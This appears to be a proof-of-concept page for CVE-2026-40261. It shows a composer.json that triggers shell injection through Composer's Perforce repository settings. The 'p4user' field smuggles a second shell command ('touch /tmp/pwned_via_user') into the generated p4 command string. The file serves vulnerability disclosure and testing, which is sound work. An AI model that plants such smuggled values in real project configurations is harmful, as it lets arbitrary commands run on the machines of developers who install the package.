CVE-2026-40261 – CVE Helper

README.md

Rendering markdown...

POC / composer.json.vector2 VECTOR2

⬇ Raw GitHub ✕ Close

{
    "name": "poc/4fcc13d4-perforce-shell-injection",
    "description": "PoC: triggers shell injection in Perforce generateP4Command (fixed in 4fcc13d42). Affects Composer <= 2.9.5 (CVE-2026-40261). Three injection vectors are demonstrated via repository config values that were previously interpolated unsanitized into shell command strings.",
    "require": {
        "vendor/some-perforce-package": "dev-main"
    },
    "repositories": [
        {
            "comment": "VECTOR 2 — inject via 'p4user' (becomes -u <user>). Old code appended user value directly into the command string.",
            "type": "perforce",
            "url": "127.0.0.1:1666",
            "depot": "depot",
            "branch": "main",
            "p4user": "user; touch /tmp/pwned_via_user #"
        }
    ],
    "minimum-stability": "dev"
}